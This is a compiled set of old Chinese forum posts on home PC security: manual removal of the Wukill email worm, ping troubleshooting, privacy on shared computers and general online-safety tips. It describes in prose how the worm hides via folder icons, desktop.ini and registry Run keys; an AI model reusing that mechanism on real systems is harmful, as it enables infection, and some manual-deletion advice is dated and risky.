首先用進程管理工具(如「優化大師」帶的進程管理工具)把可疑的進程殺掉,再搜索最大不超過87KB的「*.EXE」文件,瑞星上說的自啟動「MSTRAY.EXE」文件不對,它好象有了新的變種,自啟動的文件名可以變換,而且有時每次重啟動都會變,也不一定在WINDOWS哪個目錄下,所以要查整個不超過87KB大小的.EXE文件,然後將所有圖標為文件夾樣式的.EXE文件刪掉。同時對照註冊表裡的RUN項,查找不正常的啟動項(建議也用優化大師,這樣好判別,毒霸的也可以),除刪掉啟動項外,還要再查找一次不正常啟動項對應的程序,並刪掉。注意:這步操作十分危險,建議由有經驗的人員操作。接著再分別查找comment.htt 和desktop.ini,把它們都刪掉。注意不要把「*:My Documents」下的這兩個文件刪了,一般這裡的都是正常文件(我自己用的笨辦法就是用記事本打開,看看裡面是不是MICROSOFT的東東)。最後重啟就OK了。瑞星的在2月份就可以殺了,毒霸好象到現在都不行,是它的破壞力太小所以毒霸不屑一顧?????!!!!!!!!剛又看了看前人的貼,發現這個傢伙變種變的還是蠻快的。其中最大的變化就是自啟動項的變化,這個病毒我遇到的最厲害的是在內存中同時有不同文件名的3個進程,並且自啟動項的名稱也不斷變化,但WINFILE.EXE這個文件始終存在,而且一般是在根目錄下,並陪隨comment.htt 和desktop.ini這兩個文件,可能這可以算為標誌性文件之一了。在其它的目錄下,則會根據你實際存在的目錄名而更換自己的名稱(呵,呵,這一點我比較佩服),不過無論它怎麼換名,文件大小大都是約在85KB左右(具體位元組我沒有記錄)。建議懷疑自己中毒時,把「隱藏已知文件類型的擴展名」這個選項去掉,如果有文件夾圖標的.EXE文件,那麼恭喜你---------------中毒了!!!!!另:正常的WINFILE.EXE文件大小為151419位元組,且圖標為一個文件櫃樣式。在網上看到了一篇貼子。I-Worm.Wukill破壞方法:這個病毒採用文件夾圖標,具有很大迷惑性。該病毒運行後,會將自己大量複製到其他目錄中。 一、 病毒首次運行時將顯示"This File Has Been Damage!"; 二、 將自己複製到windows目錄下並改名為Mstray.exe; 三、 修改註冊表: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun 以達到其自啟動的目的; 四、 枚舉磁碟目錄,在每個根目錄下釋放下列文件: winfile.exe 病毒主體程序 coment.htt 利用IE漏洞調用同一個目錄下的"winfile.exe",屬性為隱藏。 desktop.ini 系統為隱藏。採用web方式瀏覽文件夾時,系統會調用該文件,該文件調用coment.htt ,從而激活病毒。 五、 病毒修改註冊表,隱藏系統文件、隱藏受系統保護的文件、隱藏已知的擴展名稱。 這樣,用戶看不到coment.htt和desktop.ini, winfile.exe被隱藏後綴明,又是文件夾圖標,用戶極容易認為是文件夾而點擊。 同時病毒在當前路徑下生成的自身拷貝,名稱採用上級目錄,或者是當前窗口的標題,增加隱蔽性。 六、病毒調用Outlook發送攜帶病毒的信件。 你先試試:1 [在運行里輸入REGEDIT (進入註冊表編輯器) 在編輯工具里點吉查找 輸winfile 確定,即輸出winfile.ini 刪除它 然後回盤裡就可以刪除了 !] 2 用KV2004升級版在網上進行了最新的升級後,運行KV2004就可以了利用Ping命令判定網路故障 (sindasun) Ping 是Windows系列自帶的一個可執行命令。利用它可以檢查網路是否能夠連通,用好它可以很好地幫助我們分析判定網路故障。應用格式:Ping IP地址。該命令還可以加許多參數使用,具體是鍵入Ping按回車即可看到詳細說明。 #11.Ping本機IP 例如本機IP地址為:172.168.200.2。則執行命令Ping 172.168.200.2。如果網卡安裝配置沒有問題,則應有類似下列顯示: Replay from 172.168.200.2bytes=32 time<10ms Ping statistics for 172.168.200.2 PacketsSent=4 Received=4Lost=00% loss Approximate round trip times in milli-seconds Minimum=0msMaxiumu=1msAverage=0ms 如果在MS-DOS方式下執行此命令顯示內容為:Request timed out,則表明網卡安裝或配置有問題。將網線斷開再次執行此命令,如果顯示正常,則說明本機使用的IP地址可能與另一台正在使用的機器IP地址重複了。如果仍然不正常,則表明本機網卡安裝或配置有問題,需繼續檢查相關網路配置。 #12.Ping網關IP 假定網關IP為:172.168.6.1,則執行命令Ping 172.168.6.1。在MS-DOS方式下執行此命令,如果顯示類似以下信息: Reply from 172.168.6.1 bytes=32 time=9ms TTL=255 Ping statistics for 172.168.6.1 PacketsSent=4Received=4Lost=00% loss Approximate round trip times in milli-seconds Minimum=1msMaximum=9msAverage=5ms 則表明區域網中的網關路由器正在正常運行。反之,則說明網關有問題。 #13.Ping遠程IP 這一命令可以檢測本機能否正常訪問Internet。比如本地電信運營商的IP地址為:202.102.48.141。在MS-DOS方式下執行命令:Ping 202.102.48.141,如果屏幕顯示: Reply from 202.102.48.141 bytes=32 time=33ms TTL=252 Reply from 202.102.48.141 bytes=32 time=21ms TTL=252 Reply from 202.102.48.141 bytes=32 time=5ms TTL=252 Reply from 202.102.48.141 bytes=32 time=6ms TTL=252 Ping statistics for 202.102.48.141 PacketsSent=4Received=4Lost=00% loss Approximate round trip times in milli-seconds Minimum=5msMaximum=33msAverage=16ms 則表明運行正常,能夠正常接入互聯網。反之,則表明主機文件(windows/host)存在問題。 東西搶註:注意一下:衝擊波之後的DNS伺服器都是禁止PING的也就是關閉了ICMP協議的這樣大家可以使用TRACERT這個命令跟蹤數據包,也是可以同樣達到目的當心電腦暴露你的隱私 (sindasun)如果使用的是辦公室、網吧等地的公共用機,你的很多秘密就可能暴露在別人眼前。 #1一、操作系統 如果想把屬於隱私的圖片、視頻片斷或者重要文檔文件等保存在公共電腦中,很多人採取的辦法把文件或文件夾的屬性改為「隱藏」,然後再把它們藏匿在電腦中某個不起眼的文件夾里。可在Win 98的「開始」→「文檔」菜單中,會記錄最近打開過的15個文件名,因此別人可以點擊相應的文件名來打開文件,就算你已經把文件藏起來了,別人也可以從這裡窺視你的秘密。 解決辦法:要清除這些痕迹,你可以用滑鼠右鍵點擊任務欄的「屬性」,後點「開始菜單程序」,再點「清除」就可以刪除「文檔」菜單中的內容和其他個人歷史記錄列表了。這樣做可以在一定程度上保護你的秘密,但別人還可以通過「開始」菜單中的「查找」功能來搜索你的重要文件,按文件的類別把硬碟上所有的圖形文件、*.txt、*.doc文件等找出來,然後一個一個地查看,秘密依然存在被泄露的可能。 報紙上曾介紹過一種修改註冊表隱藏硬碟的辦法,即把要隱藏的文件專門放到某個硬碟(如F盤)上,然後修改註冊表把這個盤藏起來(在HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer下新建一個Dword值「NoDrives」,再設置鍵值,例如把鍵值設為20就可以隱藏F盤),在資源管理器中就看不到這個盤了。這種辦法表面上無懈可擊,被隱藏的盤對於大多數軟體都不可見,你通過「查找」功能也無法找到該盤上的文件,一些所謂的電腦高手也把這種辦法當做可靠的保密手段。然而這種方法有重大的漏洞,在DOS狀態下這個盤完全可見,而在Windows下,我找到一種非常簡單的辦法破除這種限制。只要在「我的電腦」或者IE瀏覽器的地址欄中鍵入盤符「F:」,然後打回車鍵,這個盤的內容就一覽無餘,所有的秘密蕩然無存。 解決辦法:如果對保密的要求比較高,可以用一些軟體來加密或者隱藏,可以基本解決保密問題。但是,就算是用加密/隱藏軟體,也不是十分安全的。一方面有些隱藏軟體有漏洞,對於熟悉計算機的用戶來說,並不難破解限制;另一方面一些加密/隱藏軟體的加密程度不高,可找到相應的軟體來破解密碼。所以對於保密要求非常高的用戶來說,如果是比較小的文件,最好不要保存在硬碟上,可以保存在軟盤上,如果文件太大,不能保存在軟盤上,可以用PGP之類的超強加密軟體來加密。 #1二、常用程序 Windows下的很多應用程序,如Word、Excel、媒體播放器Media Player、RealPlayer等,會在該程序「文件」菜單下列出最近打開過的一些文件名。儘管你已經把文件藏匿在電腦中的某個地方了,但別人還是可以通過這些文件名清單輕易打開相應的文件。 解決辦法:對於Word 2000、Excel 2000等,可以在Word/Excel的「工具」→「選項」的「常規」選項卡中把「列出最近所用文件」的個數改為0;在媒體播放器和Realplayer中清除這些歷史記錄,只能到註冊表中刪除,要清除Realplayer中的歷史記錄,則到HKEY_LOCAL_MACHINESoftwareCLASSESSoftwareRealNetworksRealplayer6.0PreferencesMostRecentClips1刪除相關鍵值(Realplayer默認情況下是在「文件」菜單中顯示最近播放過的8個剪輯,Mostrecentclip1隻是第一個,要刪除其他幾個你還須要分別刪除)。要清除媒體播放器上的記錄只有到註冊表中,刪除HKEY_HKEY_CURRENT_USERSoftwareMicrosoftMediaPlayerPlayerRecentFileList下的鍵值。通過註冊表來清除歷史記錄比較麻煩,而且對新手來說具有一定危險性。 變通的解決辦法是:在看完這些視頻片斷之後,把文件的擴展名改為Realplayer或者媒體播放器等不支持的虛假擴展名。例如你剛才看的視頻文件名字叫做123.mpeg,你可以把它的文件名改為sdk.dhl,然後把它重新藏到其他不起眼的文件夾中,最好遠離原來的文件夾。雖然原先的記錄還保存在「文件」菜單中,但是Realplayer、媒體播放器已經找不到該文件了。下次你要再次觀看時,可以重新把文件的擴展名修改回來。修改文件擴展名對於隱藏其他類型的文件也是一個簡單有效的辦法,雖然這種辦法並不很保險,但對於很多人而言,這種辦法已經能基本滿足要求了。相比之下Yahoo!Player在這方面就做得好得多,你可以到Yahoo!Player的「Edit→Prefenrence→General」中勾選「On exit,clear history(退出時清除歷史記錄)」,這樣以後你每次關閉Yahoo!Player就會自動清除歷史記錄。 #1三、IE瀏覽器 如果你是上網用戶,更要小心你的秘密被泄露了。IE瀏覽器會記錄你訪問過的站點的地址,別人可以通過歷史記錄來查看。 解決辦法:如果你不想讓別人知道你的行蹤,可以通過點擊瀏覽器「工具→Internet選項→常規」選項卡中「清除歷史記錄」。 對於那些通過登錄Web收發電子郵件的用戶來說,你所看過的信別人可以輕易看到,這是一個極其嚴重卻被廣泛忽視的安全問題。那些在網吧上網的人士要特別小心了,說不定你前腳剛走,那些別具用心的人就來偷看你的秘密了。通過點擊瀏覽器的「歷史」按鈕,可以看到最近一段時間所訪問頁的記錄。在先選擇「離線工作」的情況下,再點擊有關E-mail的頁面,別人就可以看到你曾看過的信! 解決辦法:要消除這個漏洞,僅靠清除歷史記錄是不夠的,別人即使通過歷史記錄看不到你的訪問記錄了,但是可以到C:WindowsTemporary Internet Files文件夾中去查看全部內容。關鍵就是把這個文件夾中的內容清除,你可以點擊瀏覽器「工具」→「Internet選項」之「常規」選項卡中的「刪除文件」來刪除所有的離線內容。 你可能會發現,當你用滑鼠點擊電子郵件的用戶名登錄框時,會列出曾經輸入過的電子郵件地址;當你點擊電子郵件的主題欄時,可能會列出曾經輸入過的郵件標題;當你在論壇中的寫帖子時的標題欄中也會列出曾經輸入過的一些標題。所有這些表單中的信息都有可能會泄露你不想他人知道的信息。IE瀏覽器具有的「自動完成」功能存儲了以前曾鍵入過的條目,因此當你下次填寫表單的時候,會自動列出可能相符的項。 解決辦法:要清除記錄,可點擊IE瀏覽器的「工具」→「Internet選項」→「內容」選項卡中的「自動完成」,然後點「清除表單」來清除自動完成歷史記錄。 #1四、網路聊天與郵件 當你在聊天室、論壇中胡說八道的時候,別以為沒有人知道你來自何方,你的IP地址早已經被記錄在案。當你用QQ聊天時,別人也有辦法知道你的IP地址,只要到網上下載安裝一個查IP地址的小工具,就可以看到你的IP地址,然後通過「追捕」軟體查出你是哪個地方的(誤報可能性大),所以別奇怪有人怎麼會知道你的地理方位。 解決方案:如要想隱藏自己的IP地址,最有效的還是通過代理伺服器上網。 如今網路黑客工具(木馬程序)的泛濫,使得很多並非真正黑客的人也可以遠程控制你的計算機,竊取你的信息。當別人用QQ或者E-mail向你發相片或者歌曲的時候,說不定你正在接收一個木馬程序。計算機如果中了木馬程序後,就沒有什麼秘密可言了。 解決方案:要防範黑客程序,除了不要下載來路不明的軟體外,安裝防火牆和反病毒程序是最有效的措施。如果你對網路安全性異常敏感,還應注意對Windows系統的安全漏洞打補丁。 你不但要防範來自網上的危險,你更要防範來自現實中的竊密者。在更多的情況下,你周圍的人才是真正最危險的人。現在很多人都用QQ來聊天,也正是QQ成為泄露你秘密的主要渠道。針對QQ的竊密工具很多,可以偷竊密碼、偷看聊天記錄等,簡直讓人防不勝防。 解決方案:如果是網吧等公共場所使用QQ,聊天后最好把聊天記錄刪除。刪除聊天記錄主要有兩種辦法,如果你對電腦不太熟悉,可以點擊QQ的「消息管理」,在彈出的「消息管理器」窗口中用右鍵點擊你的號碼(在左上角),然後點「刪除消息」,就可以刪除全部聊天記錄,如果你覺得這些聊天記錄對你很重要想要保存它,你可以在「消息管理」中,用右鍵點擊自己的號碼,再點擊「導出聊天記錄為文本文件」,把它們備份到軟盤上或發到自己的郵箱保存後再刪除硬碟上的聊天記錄。有一定電腦使用經驗的用戶,可以採取第二種方法:到QQ所在的安裝目錄C:\Program Files\Tencent,刪除以你自己的QQ號碼命名的文件夾,別忘了還要清空回收站哦!從硬碟上刪除該文件夾比第一種辦法好,因為除了刪除聊天記錄外,還可在「一定程度上」防止他人用破解QQ密碼的工具從這個文件夾中偷竊你的密碼,請注意只是「在一定程度上」,因為還可以通過其他途徑來偷竊密碼。 在公共場所上網,要小心QQ號碼被盜,可QQ號碼被盜的現象依然不斷。 解決方案:要防止QQ的密碼被盜,還應注意幾點:應儘快將QQ升級到更安全更完善的最新版本。此外最好不要以生日、 名字、電話號碼等個人信息來作為密碼,密碼要複雜,不定期更換,當然也要方便你記憶。最好是數字加英文加標點符號,8∽16位最合適。如果你的密碼長度很短或者太簡單的時候,就容易被QQ密碼猜解器在短時間內猜解出來。設置完密碼後可以到騰訊網站申請密碼保護功能,被盜後方便取回密碼。 如今網上流傳一些QQ密碼竊取軟體,運行它之後,在你輸入密碼登錄QQ的同時記錄密碼到某個文件中,對這類軟體很難防範,你不僅僅要注意QQ的密碼被盜,你的其他密碼也要小心被盜。很多人為了圖省事,電子郵件和QQ是同一密碼,但這樣做存在嚴重的安全隱患,因為一旦一個密碼被竊,就全線失守了。要完全防範別人偷你的密碼,真的很不容易。最可怕的是一些在後台秘密監視計算機活動的軟體,這些監視軟體可以記錄你使用電腦的所有過程,包括你的所有鍵盤鍵入,當然你的密碼也都通通被記錄(包括QQ密碼、E-mail密碼在內的所有密碼全都暴露無遺)。要發現這類軟體的蹤跡很難,這類程序運行時,按「Ctrl+Alt+Del」也無法看到,反病毒軟體也不監控這類軟體。目前沒有很好的辦法來發現這類監視軟體。 解決方案:到控制面板中的「添加/刪除程序」屬性中,看看裡面有沒有什麼可疑的程序;另外就是從「開始」菜單中的「運行」中鍵入「msconfig」,在打開的「系統配置程序」之「啟動」項中,查查有沒有可疑的啟動項。但是這些辦法,都很不可靠。要比較徹底發現這類程序,可以使用winkill之類的內存駐留監控程序來監測有沒有異常的情況,但是使用winkill來發現這類軟體要求對計算機比較熟悉,使用起來也不方便,而且winkill只能發現可疑者而不能判斷它究竟是不是「監視軟體」。要防範這類程序真的很難,讓你防不勝防,稍不注意你的秘密就全被暴露。你還有秘密嗎?其實你已經沒有了……推薦]網上信息安全的防範技巧十三法 二十世紀九十年代末出現的INTERNET標誌著人類社會已經進入了信息化時代,在這個時代,越來越多的人已經開始離不開Internet網路。然而在現有的Internet的環境中,君子風度和信任感已經所剩無幾了。社會上能找到的所有的兇險, 卑鄙和投機, Internet上應有盡有。從Internet誕生之日起, 特別是自90年代它向公眾開放以來, 它已經成為眾矢之的。尤其是在一些電子商務網站進行購物,或者希望註冊成為某些網站的會員的時候,我們要特別注意保護自己個人信息在網上的安全。這是因為我們通過表格來註冊和提交個人信息時,程序會把這些信息打包發送到目的地,在傳送到目的地的過程中需要經過一系列的網站中轉,當然被傳送的信息就很容易在所經過的網路上留下自己的蹤跡,如果這些蛛絲馬跡不幸被某些別有用心的人截獲並加以利用,麻煩可就大了--雖然這種幾率比較低,但面對如今一無法規二無規則、尚顯無序的網路,總應該多加小心。下面,筆者就為各個用戶提供一些保護網上信息安全的方法措施,希望能夠對各位用戶。 1、不輕易運行不明真相的程序 如果你收到一封帶有附件的電子郵件,且附件是擴展名為EXE一類的文件,這時千萬不能貿然運行它,因為這個不明真相的程序,就有可能是一個系統破壞程序。攻擊者常把系統破壞程序換一個名字用電子郵件發給你,並帶有一些欺騙性主題,騙你說一些:「這是個好東東,你一定要試試」,「幫我測試一下程序」之類的話。你一定要警惕了!對待這些表面上很友好、跟善意的郵件附件,我們應該做的是立即刪除這些來歷不明的文件。 2、屏蔽小甜餅信息 小甜餅就是Cookie,它是Web伺服器發送到電腦里的數據文件,它記錄了諸如用戶名、口令和關於用戶興趣取向的信息。實際上,它使你訪問同一站點時感到方便,比如,不用重新輸入口令。但Cookies收集到的個人信息可能會被一些喜歡搞「惡作劇」的人利用,它可能造成安全隱患,因此,我們可以在瀏覽器中做一些必要的設置,要求瀏覽器在接受Cookie之前提醒您,或者乾脆拒絕它們。通常來說,Cookie會在瀏覽器被關閉時自動從計算機中刪除,可是,有許多Cookie會一反常態,始終存儲在硬碟中收集用戶的相關信息,其實這些Cookie就是被設計成能夠駐留在我們的計算機上的。隨著時間的推移,Cookie信息可能越來越多,當然我們的心境也因此變得越來越不踏實。為了確保萬無一失,對待這些已有的Cookie信息應該從硬碟中立即清除,並在瀏覽器中調整Cookie設置,讓瀏覽器拒絕接受Cookie信息。屏蔽Cookie的操作步驟為:首先用滑鼠單擊菜單欄中的「工具」菜單項,並從下拉菜單中選擇「Internet選項」;接著在選項設置框中選中「安全」標籤,並單擊標籤中的「自定義級別」按鈕;同時在打開的「安全設置」對話框中找到關於Cookie的設置,然後選擇「禁用」或「提示」。 3、不同的地方用不同的口令 對於經常上網的用戶,可能會發現在網上需要設置密碼的情況有很多。有很多用戶圖方便記憶,不論在什麼地方,都使用同一個口令,殊不知他們已不知不覺地留下了一個安全隱患。因為攻擊者一般在破獲到用戶的一個密碼後,會用這個密碼去嘗試用戶每一個需要甬道口令的地方!想想看,別人用一個口令慢慢地盜用你的帳號上網;再去偷看與冒發你的E-mail;也許還會用你的身份去聊天室損害你的形象;還有.....,想想看那後果該有多嚴重呀!所以筆者強烈建議各位用戶,每個不同的地方用不同的密碼,一定不能不同,同時要把各個對應的密碼記下來,以備日後查用。另外一點就是我們在設定密碼時,不應該使用字典中可以查到的單詞,也不要使用個人的生日,最好是字母、符號和數字混用,多用特殊字元,諸如%、&、#、和$,並且在允許的範圍內,越長越好,以保證你的密碼不易被人猜中。 4、 屏蔽ActiveX控制項 由於ActiveX控制項可以被嵌入到HTML頁面中,並下載到瀏覽器端加以執行,因此會給瀏覽器端造成一定程度的安全威脅。目前已有證據表明,在客戶端的瀏覽器中,如IE中插入某些ActiveX控制項,也將直接對伺服器端造成意想不到的安全威脅。同時,一些其他技術,如內嵌於IE的VB Script語言,用這種語言生成的客戶端可執行的程序模塊,也同 Java小程序一樣,有可能給客戶端帶來安全性能上的漏洞。此外,還有一些新技術,如ASP(Active serv er Pages)技術,由於用戶可以為ASP的輸出隨意增加客戶腳本、ActiveX控制項和動態HTML,因此在ASP腳本中同樣也都存在著一定的安全隱患。所以,用戶如果要保證自己在網際網路上的信息絕對安全,可以屏蔽掉這些可能對計算機安全構成威脅的ActiveX控制項,具體操作步驟為:首先用滑鼠單擊菜單欄中的「工具」菜單項,並從下拉菜單中選擇「Internet選項」;接著在選項設置框中選中「安全」標籤,並單擊標籤中的「自定義級別」按鈕;同時在打開的「安全設置」對話框中找到關於ActiveX控制項的設置,然後選擇「禁用」或「提示」。 5、定期清除緩存、歷史記錄以及臨時文件夾中的內容 我們在上網瀏覽信息時,瀏覽器會把我們在上網過程中瀏覽的信息保存在瀏覽器的相關設置中,這樣下次再訪問同樣信息時可以很快地達到目的地,從而提高了我們的瀏覽效率。但是瀏覽器的緩存、歷史記錄以及臨時文件夾中的內容保留了我們太多的上網的記錄,這些記錄一旦被那些無聊的人得到,他們就有可能從這些記錄中尋找到有關個人信息的蛛絲馬跡。為了確保個人信息資料的絕對安全,我們應該定期清理緩存、歷史記錄以及臨時文件夾中的內容。清理瀏覽器緩存並不麻煩,具體的操作方法如下:首先用滑鼠單擊菜單欄中的「工具」菜單項,並從下拉菜單中選擇「Internet選項」;接著在選項設置框中選中「常規」標籤,並單擊標籤中的「刪除文件」按鈕來刪除瀏覽器中的臨時文件夾中的內容;然後在同樣的餓對話框中單擊「清除歷史記錄」按鈕來刪除瀏覽器中的歷史記錄和緩存中的內容。 6、不隨意透露任何個人信息 在網上瀏覽信息時,經常會發現需要用戶註冊自己個人信息資料的表單。這些站點通過程序設計達到一種不填寫表單就不能獲取自己需要的信息的目的。面對這種強迫用戶註冊個人信息的情況,我們最好的辦法是不要輕易把自己真實的信息提交給他們,特別是不要向任何人透露你的密碼。還有,在使用ICQ、OICQ等網路軟體以及註冊免費E-mail信息的時候,我們都需要填寫一些個人資料。某些資料是必須填寫的,自然無法略過。但是對於可填可不填但又涉及自己隱私的資料,還是能免就免,您有權利保持沉默,否則您所說的一切,有可能在網路上被黑客利用。這一沉默原則同樣適用於聊天室,在弄清楚聊天室的環境和各個人物之前,使用虛擬的網名應該是明智的選擇。你應該注意你常去的地方是不是把你的IP地址顯示了出來,特別是在一些聊天室里,你一定要小心了!可能攻擊你的人就是這樣才能控制你的。因為我們撥號上網的用戶IP是動態的,你每次上網的IP是伺服器隨機分配給你的,所以自己的IP如果不讓人知道,是不會遭到襲擊的。 7、突遇莫名其妙的故障時要及時檢查系統信息 上網過程中,突然覺得計算機工作不對勁時,彷彿感覺有人在遙遠的地方遙控你。這時,你必須及時停止手中的工作,立即按Ctrl+Alt+Del複合鍵來查看一下系統是否運行了什麼其他的程序,一旦發現有莫名其妙的程序在運行,你馬上停止它,以免對整個計算機系統有更大的威脅。但是並不是所有的程序運行時出現在程序列表中,有些程序例如Back Orifice(一種黑客的後門程序)並不顯示在Ctrl+Alt+Del複合鍵的進程列表中,所以如果你的計算機中運行的是WIN98或者WIN2000操作系統,最好運行「附件」/「系統工具」/「系統信息」,然後雙擊「軟體環境」,選擇「正在運行任務」,在任務列表中尋找自己不熟悉的或者自己並沒有運行的程序,一旦找到程序後應立即終止它,以防後患
推薦閱讀:
※??讓你一看就懂的風水知識,不要花錢,自己就可以看風水了,風水的5個重要方面精彩開示!經典好文章,終...
※好女人應該知道的生活知識
※奇門遁甲入門知識,滿滿都是口訣
※陰宅風水知識
※【新知識體系】與星球同脈 與宇宙同工